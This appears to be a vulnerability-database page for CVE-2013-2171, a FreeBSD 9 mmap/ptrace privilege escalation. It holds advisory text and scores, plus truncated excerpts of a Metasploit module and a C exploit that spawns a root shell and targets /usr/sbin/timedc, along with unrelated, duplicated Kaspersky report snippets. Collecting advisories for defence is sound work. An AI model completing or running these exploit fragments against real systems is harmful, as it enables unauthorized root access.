CVE-2013-2171
published 2013-07-02CVE-2013-2171: The vm_map_lookup function in sys/vm/vm_map.c in the mmap implementation in the kernel in FreeBSD 9.0 through 9.1-RELEASE-p4 does not properly determine…
PriorityP339medium6.9CVSS 2.0
AVLACMAuNCCICAC
EXPLOIT
EPSS
6.94%
93.3th percentile
The vm_map_lookup function in sys/vm/vm_map.c in the mmap implementation in the kernel in FreeBSD 9.0 through 9.1-RELEASE-p4 does not properly determine whether a task should have write access to a memory location, which allows local users to bypass filesystem write permissions and consequently gain privileges via a crafted application that leverages read permissions, and makes mmap and ptrace system calls.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-gmfh-rp5h-w5mv: The vm_map_lookup function in sys/vm/vm_map
ghsa_unreviewed·2022-05-14
CVE-2013-2171 [MEDIUM] GHSA-gmfh-rp5h-w5mv: The vm_map_lookup function in sys/vm/vm_map
The vm_map_lookup function in sys/vm/vm_map.c in the mmap implementation in the kernel in FreeBSD 9.0 through 9.1-RELEASE-p4 does not properly determine whether a task should have write access to a memory location, which allows local users to bypass filesystem write permissions and consequently gain privileges via a crafted application that leverages read permissions, and makes mmap and ptrace system calls.
BSD
FreeBSD-SA-13:06.mmap: Privilege escalation via mmap
bsd_advisories·2013-06-18·CVSS 6.9
CVE-2013-2171 [MEDIUM] FreeBSD-SA-13:06.mmap: Privilege escalation via mmap
FreeBSD-SA-13:06.mmap Security Advisory
The FreeBSD Project
Topic: Privilege escalation via mmap
Category: core
Module: kernel
Announced: 2013-06-18
Credits: Konstantin Belousov
Alan Cox
Affects: FreeBSD 9.0 and later
Corrected: 2013-06-18 07:04:19 UTC (stable/9, 9.1-STABLE)
2013-06-18 07:05:51 UTC (releng/9.1, 9.1-RELEASE-p4)
CVE Name: CVE-2013-2171
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit .
0. Revision History
v1.0 2013-06-18 Initial release.
v1.1 2013-06-21 Corrected correction date.
Added workaround information.
I. Background
The FreeBSD virtual memory system allows files to be memory-mapped.
All or parts of a file can be made available to a process via i
No detection rules found.
Exploit-DB
FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)
exploitdb·2013-06-26
CVE-2013-2171 FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)
FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit4 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability that can be used to modify portions of
a process's address space, which may lead to privilege escalation. Systems
such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Konstantin Belousov', # Discovery
'Alan Cox', # Discovery
'Hunger', # POC
'sinn3r' # Metasploit
],
'Platform' =>
Exploit-DB
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
exploitdb·2013-06-21
CVE-2013-2171 FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
FreeBSD 9.0
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago... :)
*
* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
* sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
* I hope we'll meet again at 8@1470n ;)
*
* Special thanks to proactivesec.com
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"
int
main(int ac, char **av) {
int from_fd, to_fd, status;
struct stat st;
struct ptrace_io_desc piod;
char *s, *d;
pid_t pid;
if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}
printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
printf("by Hunger \n");
if ((from_fd = open(av[0],
Metasploit
FreeBSD 9 Address Space Manipulation Privilege Escalation
metasploit
FreeBSD 9 Address Space Manipulation Privilege Escalation
FreeBSD 9 Address Space Manipulation Privilege Escalation
This module exploits a vulnerability that can be used to modify portions of a process's address space, which may lead to privilege escalation. Systems such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
Securelist
Investigation Report for the September 2014 Equation malware detection incident in the US
blogs_securelist·2017-11-16
Investigation Report for the September 2014 Equation malware detection incident in the US
Authors
- Kaspersky
## Background
In early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee’s home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:
1. Was our software used outside of its intended functionality to pull classified information from a person’s c
Securelist
Investigation Report for the September 2014 Equation malware detection incident in the US
blogs_securelist·2017-11-16
Investigation Report for the September 2014 Equation malware detection incident in the US
Authors
Kaspersky
## Background
In early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee’s home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:
Was our software used outside of its intended functionality to pull classified information from a person’s comput
http://svnweb.freebsd.org/base?view=revision&revision=251901http://www.debian.org/security/2013/dsa-2714http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.aschttp://svnweb.freebsd.org/base?view=revision&revision=251901http://www.debian.org/security/2013/dsa-2714http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
2013-07-02
Published